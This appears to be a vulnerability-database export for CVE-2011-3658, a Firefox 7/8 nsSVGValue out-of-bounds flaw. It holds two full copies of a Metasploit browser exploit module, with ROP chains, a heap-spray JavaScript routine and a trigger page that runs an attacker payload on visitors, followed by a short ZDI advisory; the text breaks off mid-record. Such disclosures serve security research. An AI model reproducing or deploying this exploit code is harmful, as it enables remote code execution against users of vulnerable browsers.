AverageRanking \n \ninclude Msf::Exploit::Remote::HttpServer::HTML \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Firefox 7/8 (<= 8.0.1) nsSVGValue Out-of-Bounds Access Vulnerability', \n'Description' => %q{ \nThis module exploits an out-of-bounds access flaw in Firefox 7 and 8 (<= 8.0.1). \nThe notification of nsSVGValue observers via nsSVGValue::NotifyObservers(x,y) \nuses a loop which can result in an out-of-bounds access to attacker-controlled memory. \nThe mObserver ElementAt() function (which picks up pointers), does not validate \nif a given index is out of bound. If a custom observer of nsSVGValue is created, \nwhich removes elements from the original observer, \nand memory layout is manipulated properly, the ElementAt() function might pick up \nan attacker provided pointer, which can be leveraged to gain remote arbitrary \ncode execution. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'regenrecht', #vulnerability discovery \n'Lincoln<lincoln[at]corelan.be>', #Metasploit module \n'corelanc0d3r<peter.ve[at]corelan.be>' #Metasploit module \n], \n'References' => \n[ \n[ 'CVE', '2011-3658' ], \n[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-056/' ], \n[ 'URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=708186' ] \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n'InitialAutoRunScript' => 'migrate -f' \n}, \n'Payload' => \n{ \n'BadChars' => \"\\x00\\x0a\\x0d\\x34\", \n'DisableNops' => true, \n'PrependEncoder' => \"\\x81\\xc4\\x24\\xfa\\xff\\xff\" \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Automatic', {} ], \n[ \n'Windows XP - Firefox 7', \n{ \n'Ret' => 0x0C0C0C0C, \n'OffSet' => 0x606, \n'Size' => 0x40000, \n'PopEax' => 0x7819e4b4, # POP EAX # RETN [MOZCRT19.dll] \n'FF' => 7, \n'OS' => 'XP' \n} \n], \n[ \n'Windows XP - Firefox 8 (<= 8.0.1)', \n{ \n'Ret' => 0x0C0C0C0C, \n'OffSet' => 0x606, \n'Size' => 0x40000, \n'PopEax' => 0x7819e504, # POP EAX # RETN [MOZCRT19.dll] \n'FF' => 8, \n'OS' => 'XP' \n} \n] \n], \n'DisclosureDate' => 'Dec 6 2011', \n'DefaultTarget' => 0)) \n \nend \n \ndef autofilter \nfalse \nend \n \ndef check_dependencies \nuse_zlib \nend \n \ndef junk(n=4) \nreturn rand_text_alpha_upper(n).unpack(\"L\")[0].to_i \nend \n \ndef nop \nreturn make_nops(4).unpack(\"L\")[0].to_i \nend \n \ndef get_rop_chain(ffversion,osversion) \n \n# mona.py ROP chains \n \nrop_chain = [] \n \nif ffversion == 7 and osversion == \"XP\" \n \nrop_chain = \n[ \n0x781a909c, # ptr to &VirtualAlloc() [IAT MOZCRT19.dll] \n0x7813aeed, # MOV EAX,DWORD PTR DS:[EAX] # RETN [MOZCRT19.dll] \n0x78194774, # PUSH EAX # POP ESI # POP EDI # POP EBP # POP EBX # RETN [MOZCRT19.dll] \n0x78139801, # RETN (ROP NOP) [MOZCRT19.dll] -> edi \n0x78195375, # & push esp # ret [MOZCRT19.dll] -> ebp \n0x00000001, # 0x00000001-> ebx \n0x7819966e, # POP EDX # RETN [MOZCRT19.dll] \n0x00001000, # 0x00001000-> edx \n0x7813557f, # POP ECX # RETN [MOZCRT19.dll] \n0x00000040, # 0x00000040-> ecx \n0x781a4da8, # POP EAX # RETN [MOZCRT19.dll] \nnop, # nop \n0x7813d647, # PUSHAD # RETN [MOZCRT19.dll] \n].flatten.pack(\"V*\") \n \nelsif ffversion == 8 and osversion == \"XP\" \n \nrop_chain = \n[ \n0x781a909c, # ptr to &VirtualAlloc() [IAT MOZCRT19.dll] \n0x7813af5d, # MOV EAX,DWORD PTR DS:[EAX] # RETN [MOZCRT19.dll] \n0x78197f06, # XCHG EAX,ESI # RETN [MOZCRT19.dll] \n0x7814eef1, # POP EBP # RETN [MOZCRT19.dll] \n0x781503c3, # & call esp [MOZCRT19.dll] \n0x781391d0, # POP EBX # RETN [MOZCRT19.dll] \n0x00000001, # 0x00000001-> ebx \n0x781a147c, # POP EDX # RETN [MOZCRT19.dll] \n0x00001000, # 0x00001000-> edx \n0x7819728e, # POP ECX # RETN [MOZCRT19.dll] \n0x00000040, # 0x00000040-> ecx \n0x781945b5, # POP EDI # RETN [MOZCRT19.dll] \n0x78152809, # RETN (ROP NOP) [MOZCRT19.dll] \n0x7819ce58, # POP EAX # RETN [MOZCRT19.dll] \nnop, # nop \n0x7813d6b7, # PUSHAD # RETN [MOZCRT19.dll] \n].flatten.pack(\"V*\") \n \nend \n \nreturn rop_chain \nend \n \n \ndef on_request_uri(cli, request) \n# Re-generate the payload. \nreturn if ((p = regenerate_payload(cli)) == nil) \n \n# determine the target FF and OS version \n \nffversion = \"\" \nosversion = \"\" \n \nagent = request.headers['User-Agent'] \n \nif agent !~ /Firefox\\/7\\.0/ and agent !~ /Firefox\\/8\\.0/ and agent !~ /Firefox\\/8\\.0\\.1/ \nvprint_error(\"This browser version is not supported: #{agent.to_s}\") \nsend_not_found(cli) \nreturn \nend \n \nmy_target = target \nif my_target.name == 'Automatic' \nif agent =~ /NT 5\\.1/ and agent =~ /Firefox\\/7/ \nmy_target = targets[1] \nelsif agent =~ /NT 5\\.1/ and agent =~ /Firefox\\/8/ \nmy_target = targets[2] \nelsif vprint_error(\"This Operating System is not supported: #{agent.to_s}\") \nsend_not_found(cli) \nreturn \nend \ntarget = my_target \nend \n \n# Create the payload \nprint_status(\"Creating payload for #{target.name}\") \ntable = \n[ \n0x0c0c0c0c, # index \n0x0c0c0c0c, # index \n0x0c0c0c0c, # index \n0x7c45abdf # Stack->Heap Flip XCHG EAX,ESP # ADD [EAX],EAX # ADD ESP,48h # RETN 28 [MOZCPP19.DLL] \n].pack(\"V*\") \n \nrop = rand_text_alpha_upper(56) \nrop << [ target['PopEax'] ].pack(\"V\") \nrop << rand_text_alpha_upper(40) \nrop << get_rop_chain(target['FF'],target['OS']) \n \n# Encode table, chain and payload \nrop_js = Rex::Text.to_unescape(table+rop, Rex::Arch.endian(target.arch)) \n \ncode = payload.encoded \ncode_js = Rex::Text.to_unescape(code, Rex::Arch.endian(target.arch)) \n \n# random JavaScript variable names \ni_name = rand_text_alpha(rand(10) + 5) \nrop_name = rand_text_alpha(rand(10) + 5) \ncode_name = rand_text_alpha(rand(10) + 5) \noffset_length_name = rand_text_alpha(rand(10) + 5) \nrandnum1_name = rand_text_alpha(rand(10) + 5) \nrandnum2_name = rand_text_alpha(rand(10) + 5) \nrandnum3_name = rand_text_alpha(rand(10) + 5) \nrandnum4_name = rand_text_alpha(rand(10) + 5) \npaddingstr_name = rand_text_alpha(rand(10) + 5) \npadding_name = rand_text_alpha(rand(10) + 5) \njunk_offset_name = rand_text_alpha(rand(10) + 5) \nsingle_sprayblock_name = rand_text_alpha(rand(10) + 5) \nsprayblock_name = rand_text_alpha(rand(10) + 5) \nvarname_name = rand_text_alpha(rand(10) + 5) \nthisvarname_name = rand_text_alpha(rand(10) + 5) \ncontainer_name = rand_text_alpha(rand(10) + 5) \ntls_name = rand_text_alpha(rand(10) + 5) \ntl_name = rand_text_alpha(rand(10) + 5) \nrect_name = rand_text_alpha(rand(10) + 5) \nbig_name = rand_text_alpha(rand(10) + 5) \nsmall_name = rand_text_alpha(rand(10) + 5) \nlistener_name = rand_text_alpha(rand(10) + 5) \nrun_name = rand_text_alpha(rand(10) + 5) \nsvg_name = rand_text_alpha(rand(10) + 5) \natl_name = rand_text_alpha(rand(10) + 5) \naddr_name = rand_text_alpha(rand(10) + 5) \ntrans_name = rand_text_alpha(rand(10) + 5) \nmatrix_name = rand_text_alpha(rand(10) + 5) \n \n# corelan precise heap spray for Firefox >= 7 \n# + trigger routine \nspray = <<-JS \n \nvar #{rop_name} = unescape(\"#{rop_js}\"); \nvar #{code_name} = unescape(\"#{code_js}\"); \nvar #{offset_length_name} = #{target['OffSet']}; \n \nfor (var #{i_name}=0; #{i_name} < 0x300; #{i_name}++) \n{ \nvar #{randnum1_name}=Math.floor(Math.random()*90)+10; \nvar #{randnum2_name}=Math.floor(Math.random()*90)+10; \nvar #{randnum3_name}=Math.floor(Math.random()*90)+10; \nvar #{randnum4_name}=Math.floor(Math.random()*90)+10; \n \nvar #{paddingstr_name} = \"%u\" + #{randnum1_name}.toString() + #{randnum2_name}.toString(); \n#{paddingstr_name} += \"%u\" + #{randnum3_name}.toString() + #{randnum4_name}.toString(); \n \nvar #{padding_name} = unescape(#{paddingstr_name}); \n \nwhile (#{padding_name}.length < 0x1000) #{padding_name}+= #{padding_name}; \n \n#{junk_offset_name} = #{padding_name}.substring(0, #{offset_length_name}); \n \nvar #{single_sprayblock_name} = #{junk_offset_name} + #{rop_name} + #{code_name}; \n#{single_sprayblock_name} += #{padding_name}.substring(0,0x800 - #{offset_length_name} - #{rop_name}.length - #{code_name}.length); \n \nwhile (#{single_sprayblock_name}.length < #{target['Size']}) #{single_sprayblock_name} += #{single_sprayblock_name}; \n \n#{sprayblock_name} = #{single_sprayblock_name}.substring(0, (#{target['Size']}-6)/2); \n \n#{varname_name} = \"var\" + #{randnum1_name}.toString() + #{randnum2_name}.toString(); \n#{varname_name} += #{randnum3_name}.toString() + #{randnum4_name}.toString() + #{i_name}.toString(); \n#{thisvarname_name} = \"var \" + #{varname_name} + \"= '\" + #{sprayblock_name} +\"';\"; \neval(#{thisvarname_name}); \n} \n \nvar #{container_name} = []; \n \nvar #{tls_name} = []; \nvar #{rect_name} = null; \nvar #{big_name} = null; \nvar #{small_name} = null; \n \nfunction #{listener_name}() { \n#{rect_name}.removeEventListener(\"DOMAttrModified\", #{listener_name}, false); \nfor each (#{tl_name} in #{tls_name}) \n#{tl_name}.clear(); \n \nfor (#{i_name} = 0; #{i_name} < (1<<7); ++#{i_name}) \n#{container_name}.push(unescape(#{big_name})); \nfor (#{i_name} = 0; #{i_name} < (1<<22); ++#{i_name}) \n#{container_name}.push(unescape(#{small_name})); \n} \n \nfunction #{run_name}() { \nvar #{svg_name} = document.getElementById(\"#{svg_name}\"); \n#{rect_name} = document.getElementById(\"#{rect_name}\"); \n \nfor (#{i_name} = 0; #{i_name} < (1<<13); ++#{i_name}) { \n#{rect_name} = #{rect_name}.cloneNode(false); \nvar #{atl_name} = #{rect_name}.transform; \nvar #{tl_name} = #{atl_name}.baseVal; \n#{tls_name}.push(#{tl_name}); \n} \n \nconst #{addr_name} = unescape(\"%u0c0c\"); \n#{big_name} = #{addr_name}; \nwhile (#{big_name}.length != 0x1000) \n#{big_name} += #{big_name}; \n \n#{small_name} = #{addr_name}; \nwhile (#{small_name}.length != 15) \n#{small_name} += #{addr_name}; \n \nvar #{trans_name} = #{svg_name}.createSVGTransform(); \nfor each (#{tl_name} in #{tls_name}) \n#{tl_name}.appendItem(#{trans_name}); \n \n#{rect_name}.addEventListener(\"DOMAttrModified\", #{listener_name}, false); \nvar #{matrix_name} = #{svg_name}.createSVGMatrix(); \n#{trans_name}.setMatrix(#{matrix_name}); \n} \nJS \n \n# build html \ncontent = <<-HTML \n<html> \n<head> \n<meta http-equiv=\"refresh\" content=\"3\"> \n<body> \n<script language='javascript'> \n#{spray} \n</script> \n</head> \n<body onload=\"#{run_name}();\"> \n<svg id=\"#{svg_name}\"> \n<rect id=\"#{rect_name}\" /> \n</svg> \n</body> \n</html> \nHTML \n \nprint_status(\"Sending HTML\") \n \n# Transmit the response to the client \nsend_response(cli, content, {'Content-Type'=>'text/html'}) \n \nend \n \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/112544/mozilla_nssvgvalue.rb.txt"}], "exploitdb": [{"lastseen": "2016-02-02T10:33:20", "description": "Firefox 7/8 (. CVE-2011-3658. Remote exploit for windows platform", "published": "2012-05-09T00:00:00", "type": "exploitdb", "title": "Firefox 7 / 8<= 8.0.1 - nsSVGValue Out-of-Bounds Access Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-3658"], "modified": "2012-05-09T00:00:00", "id": "EDB-ID:18847", "href": "https://www.exploit-db.com/exploits/18847/", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = AverageRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Firefox 7/8 (<= 8.0.1) nsSVGValue Out-of-Bounds Access Vulnerability',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\tThis module exploits an out-of-bounds access flaw in Firefox 7 and 8 (<= 8.0.1).\r\n\t\t\t\tThe notification of nsSVGValue observers via nsSVGValue::NotifyObservers(x,y)\r\n\t\t\t\tuses a loop which can result in an out-of-bounds access to attacker-controlled memory.\r\n\t\t\t\tThe mObserver ElementAt() function (which picks up pointers), does not validate\r\n\t\t\t\tif a given index is out of bound. If a custom observer of nsSVGValue is created,\r\n\t\t\t\twhich removes elements from the original observer,\r\n\t\t\t\tand memory layout is manipulated properly, the ElementAt() function might pick up\r\n\t\t\t\tan attacker provided pointer, which can be leveraged to gain remote arbitrary\r\n\t\t\t\tcode execution.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'regenrecht', #vulnerability discovery\r\n\t\t\t\t\t'Lincoln<lincoln[at]corelan.be>', #Metasploit module\r\n\t\t\t\t\t'corelanc0d3r<peter.ve[at]corelan.be>' #Metasploit module\r\n\t\t\t\t],\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2011-3658' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-056/' ],\r\n\t\t\t\t\t[ 'URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=708186' ]\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t\t'InitialAutoRunScript' => 'migrate -f'\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x0a\\x0d\\x34\",\r\n\t\t\t\t\t'DisableNops' => true,\r\n\t\t\t\t\t'PrependEncoder' => \"\\x81\\xc4\\x24\\xfa\\xff\\xff\"\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Automatic', {} ],\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Windows XP - Firefox 7',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x0C0C0C0C,\r\n\t\t\t\t\t\t\t'OffSet' => 0x606,\r\n\t\t\t\t\t\t\t'Size' => 0x40000,\r\n\t\t\t\t\t\t\t'PopEax' => 0x7819e4b4, # POP EAX # RETN [MOZCRT19.dll]\r\n\t\t\t\t\t\t\t'FF' => 7,\r\n\t\t\t\t\t\t\t'OS' => 'XP'\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Windows XP - Firefox 8 (<= 8.0.1)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x0C0C0C0C,\r\n\t\t\t\t\t\t\t'OffSet' => 0x606,\r\n\t\t\t\t\t\t\t'Size' => 0x40000,\r\n\t\t\t\t\t\t\t'PopEax' => 0x7819e504, # POP EAX # RETN [MOZCRT19.dll]\r\n\t\t\t\t\t\t\t'FF' => 8,\r\n\t\t\t\t\t\t\t'OS' => 'XP'\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t]\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Dec 6 2011',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\tend\r\n\r\n\tdef autofilter\r\n\t\tfalse\r\n\tend\r\n\r\n\tdef check_dependencies\r\n\t\tuse_zlib\r\n\tend\r\n\r\n\tdef junk(n=4)\r\n\t\treturn rand_text_alpha_upper(n).unpack(\"L\")[0].to_i\r\n\tend\r\n\r\n\tdef nop\r\n\t\treturn make_nops(4).unpack(\"L\")[0].to_i\r\n\tend\r\n\r\n\tdef get_rop_chain(ffversion,osversion)\r\n\r\n\t\t# mona.py ROP chains\r\n\r\n\t\trop_chain = []\r\n\r\n\t\tif ffversion == 7 and osversion == \"XP\"\r\n\r\n\t\t\trop_chain =\r\n\t\t\t[\r\n\t\t\t\t0x781a909c, # ptr to &VirtualAlloc() [IAT MOZCRT19.dll]\r\n\t\t\t\t0x7813aeed, # MOV EAX,DWORD PTR DS:[EAX] # RETN [MOZCRT19.dll]\r\n\t\t\t\t0x78194774, # PUSH EAX # POP ESI # POP EDI # POP EBP # POP EBX # RETN [MOZCRT19.dll]\r\n\t\t\t\t0x78139801, # RETN (ROP NOP) [MOZCRT19.dll] -> edi\r\n\t\t\t\t0x78195375, # & push esp # ret [MOZCRT19.dll] -> ebp\r\n\t\t\t\t0x00000001, # 0x00000001-> ebx\r\n\t\t\t\t0x7819966e, # POP EDX # RETN [MOZCRT19.dll]\r\n\t\t\t\t0x00001000, # 0x00001000-> edx\r\n\t\t\t\t0x7813557f, # POP ECX # RETN [MOZCRT19.dll]\r\n\t\t\t\t0x00000040, # 0x00000040-> ecx\r\n\t\t\t\t0x781a4da8, # POP EAX # RETN [MOZCRT19.dll]\r\n\t\t\t\tnop, # nop\r\n\t\t\t\t0x7813d647, # PUSHAD # RETN [MOZCRT19.dll]\r\n\t\t\t].flatten.pack(\"V*\")\r\n\r\n\t\telsif ffversion == 8 and osversion == \"XP\"\r\n\r\n\t\t\trop_chain =\r\n\t\t\t[\r\n\t\t\t\t0x781a909c, # ptr to &VirtualAlloc() [IAT MOZCRT19.dll]\r\n\t\t\t\t0x7813af5d, # MOV EAX,DWORD PTR DS:[EAX] # RETN [MOZCRT19.dll]\r\n\t\t\t\t0x78197f06, # XCHG EAX,ESI # RETN [MOZCRT19.dll]\r\n\t\t\t\t0x7814eef1, # POP EBP # RETN [MOZCRT19.dll]\r\n\t\t\t\t0x781503c3, # & call esp [MOZCRT19.dll]\r\n\t\t\t\t0x781391d0, # POP EBX # RETN [MOZCRT19.dll]\r\n\t\t\t\t0x00000001, # 0x00000001-> ebx\r\n\t\t\t\t0x781a147c, # POP EDX # RETN [MOZCRT19.dll]\r\n\t\t\t\t0x00001000, # 0x00001000-> edx\r\n\t\t\t\t0x7819728e, # POP ECX # RETN [MOZCRT19.dll]\r\n\t\t\t\t0x00000040, # 0x00000040-> ecx\r\n\t\t\t\t0x781945b5, # POP EDI # RETN [MOZCRT19.dll]\r\n\t\t\t\t0x78152809, # RETN (ROP NOP) [MOZCRT19.dll]\r\n\t\t\t\t0x7819ce58, # POP EAX # RETN [MOZCRT19.dll]\r\n\t\t\t\tnop, # nop\r\n\t\t\t\t0x7813d6b7, # PUSHAD # RETN [MOZCRT19.dll]\r\n\t\t\t].flatten.pack(\"V*\")\r\n\r\n\t\tend\r\n\r\n\t\treturn rop_chain\r\n\tend\r\n\r\n\r\n\tdef on_request_uri(cli, request)\r\n\t\t# Re-generate the payload.\r\n\t\treturn if ((p = regenerate_payload(cli)) == nil)\r\n\r\n\t\t# determine the target FF and OS version\r\n\r\n\t\tffversion = \"\"\r\n\t\tosversion = \"\"\r\n\r\n\t\tagent = request.headers['User-Agent']\r\n\r\n\t\tif agent !~ /Firefox\\/7\\.0/ and agent !~ /Firefox\\/8\\.0/ and agent !~ /Firefox\\/8\\.0\\.1/\r\n\t\t\tvprint_error(\"This browser version is not supported: #{agent.to_s}\")\r\n\t\t\tsend_not_found(cli)\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\tmy_target = target\r\n\t\tif my_target.name == 'Automatic'\r\n\t\t\tif agent =~ /NT 5\\.1/ and agent =~ /Firefox\\/7/\r\n\t\t\t\tmy_target = targets[1]\r\n\t\t\telsif agent =~ /NT 5\\.1/ and agent =~ /Firefox\\/8/\r\n\t\t\t\tmy_target = targets[2]\r\n\t\t\telsif vprint_error(\"This Operating System is not supported: #{agent.to_s}\")\r\n\t\t\t\tsend_not_found(cli)\r\n\t\t\t\treturn\r\n\t\t\tend\r\n\t\t\ttarget = my_target\r\n\t\tend\r\n\r\n\t\t# Create the payload\r\n\t\tprint_status(\"Creating payload for #{target.name}\")\r\n\t\ttable =\r\n\t\t[\r\n\t\t\t0x0c0c0c0c, # index\r\n\t\t\t0x0c0c0c0c, # index\r\n\t\t\t0x0c0c0c0c, # index\r\n\t\t\t0x7c45abdf # Stack->Heap Flip XCHG EAX,ESP # ADD [EAX],EAX # ADD ESP,48h # RETN 28 [MOZCPP19.DLL]\r\n\t\t].pack(\"V*\")\r\n\r\n\t\trop = rand_text_alpha_upper(56)\r\n\t\trop << [ target['PopEax'] ].pack(\"V\")\r\n\t\trop << rand_text_alpha_upper(40)\r\n\t\trop << get_rop_chain(target['FF'],target['OS'])\r\n\r\n\t\t# Encode table, chain and payload\r\n\t\trop_js = Rex::Text.to_unescape(table+rop, Rex::Arch.endian(target.arch))\r\n\r\n\t\tcode = payload.encoded\r\n\t\tcode_js = Rex::Text.to_unescape(code, Rex::Arch.endian(target.arch))\r\n\r\n\t\t# random JavaScript variable names\r\n\t\ti_name = rand_text_alpha(rand(10) + 5)\r\n\t\trop_name = rand_text_alpha(rand(10) + 5)\r\n\t\tcode_name = rand_text_alpha(rand(10) + 5)\r\n\t\toffset_length_name = rand_text_alpha(rand(10) + 5)\r\n\t\trandnum1_name = rand_text_alpha(rand(10) + 5)\r\n\t\trandnum2_name = rand_text_alpha(rand(10) + 5)\r\n\t\trandnum3_name = rand_text_alpha(rand(10) + 5)\r\n\t\trandnum4_name = rand_text_alpha(rand(10) + 5)\r\n\t\tpaddingstr_name = rand_text_alpha(rand(10) + 5)\r\n\t\tpadding_name = rand_text_alpha(rand(10) + 5)\r\n\t\tjunk_offset_name = rand_text_alpha(rand(10) + 5)\r\n\t\tsingle_sprayblock_name = rand_text_alpha(rand(10) + 5)\r\n\t\tsprayblock_name = rand_text_alpha(rand(10) + 5)\r\n\t\tvarname_name = rand_text_alpha(rand(10) + 5)\r\n\t\tthisvarname_name = rand_text_alpha(rand(10) + 5)\r\n\t\tcontainer_name = rand_text_alpha(rand(10) + 5)\r\n\t\ttls_name = rand_text_alpha(rand(10) + 5)\r\n\t\ttl_name = rand_text_alpha(rand(10) + 5)\r\n\t\trect_name = rand_text_alpha(rand(10) + 5)\r\n\t\tbig_name = rand_text_alpha(rand(10) + 5)\r\n\t\tsmall_name = rand_text_alpha(rand(10) + 5)\r\n\t\tlistener_name = rand_text_alpha(rand(10) + 5)\r\n\t\trun_name = rand_text_alpha(rand(10) + 5)\r\n\t\tsvg_name = rand_text_alpha(rand(10) + 5)\r\n\t\tatl_name = rand_text_alpha(rand(10) + 5)\r\n\t\taddr_name = rand_text_alpha(rand(10) + 5)\r\n\t\ttrans_name = rand_text_alpha(rand(10) + 5)\r\n\t\tmatrix_name = rand_text_alpha(rand(10) + 5)\r\n\r\n\t\t# corelan precise heap spray for Firefox >= 7\r\n\t\t# + trigger routine\r\n\t\tspray = <<-JS\r\n\r\n\t\tvar #{rop_name} = unescape(\"#{rop_js}\");\r\n\t\tvar #{code_name} = unescape(\"#{code_js}\");\r\n\t\tvar #{offset_length_name} = #{target['OffSet']};\r\n\r\n\t\tfor (var #{i_name}=0; #{i_name} < 0x300; #{i_name}++)\r\n\t\t{\r\n\t\t\tvar #{randnum1_name}=Math.floor(Math.random()*90)+10;\r\n\t\t\tvar #{randnum2_name}=Math.floor(Math.random()*90)+10;\r\n\t\t\tvar #{randnum3_name}=Math.floor(Math.random()*90)+10;\r\n\t\t\tvar #{randnum4_name}=Math.floor(Math.random()*90)+10;\r\n\r\n\t\t\tvar #{paddingstr_name} = \"%u\" + #{randnum1_name}.toString() + #{randnum2_name}.toString();\r\n\t\t\t#{paddingstr_name} += \"%u\" + #{randnum3_name}.toString() + #{randnum4_name}.toString();\r\n\r\n\t\t\tvar #{padding_name} = unescape(#{paddingstr_name});\r\n\r\n\t\t\twhile (#{padding_name}.length < 0x1000) #{padding_name}+= #{padding_name};\r\n\r\n\t\t\t#{junk_offset_name} = #{padding_name}.substring(0, #{offset_length_name});\r\n\r\n\t\t\tvar #{single_sprayblock_name} = #{junk_offset_name} + #{rop_name} + #{code_name};\r\n\t\t\t#{single_sprayblock_name} += #{padding_name}.substring(0,0x800 - #{offset_length_name} - #{rop_name}.length - #{code_name}.length);\r\n\r\n\t\t\twhile (#{single_sprayblock_name}.length < #{target['Size']}) #{single_sprayblock_name} += #{single_sprayblock_name};\r\n\r\n\t\t\t#{sprayblock_name} = #{single_sprayblock_name}.substring(0, (#{target['Size']}-6)/2);\r\n\r\n\t\t\t#{varname_name} = \"var\" + #{randnum1_name}.toString() + #{randnum2_name}.toString();\r\n\t\t\t#{varname_name} += #{randnum3_name}.toString() + #{randnum4_name}.toString() + #{i_name}.toString();\r\n\t\t\t#{thisvarname_name} = \"var \" + #{varname_name} + \"= '\" + #{sprayblock_name} +\"';\";\r\n\t\t\teval(#{thisvarname_name});\r\n\t\t}\r\n\r\n\t\tvar #{container_name} = [];\r\n\r\n\t\tvar #{tls_name} = [];\r\n\t\tvar #{rect_name} = null;\r\n\t\tvar #{big_name} = null;\r\n\t\tvar #{small_name} = null;\r\n\r\n\t\tfunction #{listener_name}() {\r\n\t\t\t#{rect_name}.removeEventListener(\"DOMAttrModified\", #{listener_name}, false);\r\n\t\t\tfor each (#{tl_name} in #{tls_name})\r\n\t\t\t#{tl_name}.clear();\r\n\r\n\t\t\tfor (#{i_name} = 0; #{i_name} < (1<<7); ++#{i_name})\r\n\t\t\t\t#{container_name}.push(unescape(#{big_name}));\r\n\t\t\tfor (#{i_name} = 0; #{i_name} < (1<<22); ++#{i_name})\r\n\t\t\t\t#{container_name}.push(unescape(#{small_name}));\r\n\t\t}\r\n\r\n\t\tfunction #{run_name}() {\r\n\t\t\tvar #{svg_name} = document.getElementById(\"#{svg_name}\");\r\n\t\t\t#{rect_name} = document.getElementById(\"#{rect_name}\");\r\n\r\n\t\t\tfor (#{i_name} = 0; #{i_name} < (1<<13); ++#{i_name}) {\r\n\t\t\t\t#{rect_name} = #{rect_name}.cloneNode(false);\r\n\t\t\t\tvar #{atl_name} = #{rect_name}.transform;\r\n\t\t\t\tvar #{tl_name} = #{atl_name}.baseVal;\r\n\t\t\t\t#{tls_name}.push(#{tl_name});\r\n\t\t\t}\r\n\r\n\t\t\tconst #{addr_name} = unescape(\"%u0c0c\");\r\n\t\t\t#{big_name} = #{addr_name};\r\n\t\t\twhile (#{big_name}.length != 0x1000)\r\n\t\t\t#{big_name} += #{big_name};\r\n\r\n\t\t\t#{small_name} = #{addr_name};\r\n\t\t\twhile (#{small_name}.length != 15)\r\n\t\t\t#{small_name} += #{addr_name};\r\n\r\n\t\t\tvar #{trans_name} = #{svg_name}.createSVGTransform();\r\n\t\t\tfor each (#{tl_name} in #{tls_name})\r\n\t\t\t\t#{tl_name}.appendItem(#{trans_name});\r\n\r\n\t\t\t#{rect_name}.addEventListener(\"DOMAttrModified\", #{listener_name}, false);\r\n\t\t\tvar #{matrix_name} = #{svg_name}.createSVGMatrix();\r\n\t\t\t#{trans_name}.setMatrix(#{matrix_name});\r\n\t\t}\r\n\t\tJS\r\n\r\n\t\t# build html\r\n\t\tcontent = <<-HTML\r\n\t\t<html>\r\n\t\t<head>\r\n\t\t<meta http-equiv=\"refresh\" content=\"3\">\r\n\t\t<body>\r\n\t\t<script language='javascript'>\r\n\t\t#{spray}\r\n\t\t</script>\r\n\t\t</head>\r\n\t\t<body onload=\"#{run_name}();\">\r\n\t\t<svg id=\"#{svg_name}\">\r\n\t\t<rect id=\"#{rect_name}\"\t/>\r\n\t\t</svg>\r\n\t\t</body>\r\n\t\t</html>\r\n\t\tHTML\r\n\r\n\t\tprint_status(\"Sending HTML\")\r\n\r\n\t\t# Transmit the response to the client\r\n\t\tsend_response(cli, content, {'Content-Type'=>'text/html'})\r\n\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/18847/"}], "zdi": [{"lastseen": "2020-06-22T11:40:35", "bulletinFamily": "info", "cvelist": ["CVE-2011-3658"], "edition": 3, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Mozilla Firefox. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of nsSVGValue observers. A certain method call can be made to loop excessively causing an out-of-bounds memory access. By abusing this behavior an attacker can ensure this memory is under control and leverage the situation to achieve remote code execution under the context of the user running the browser.", "modified": "2012-06-22T00:00:00", "published": "2012-04-09T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-12-056/", "id": "ZDI-12-056", "title": "Mozilla Firefox nsSVGValue Out-of-Bounds Access Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": 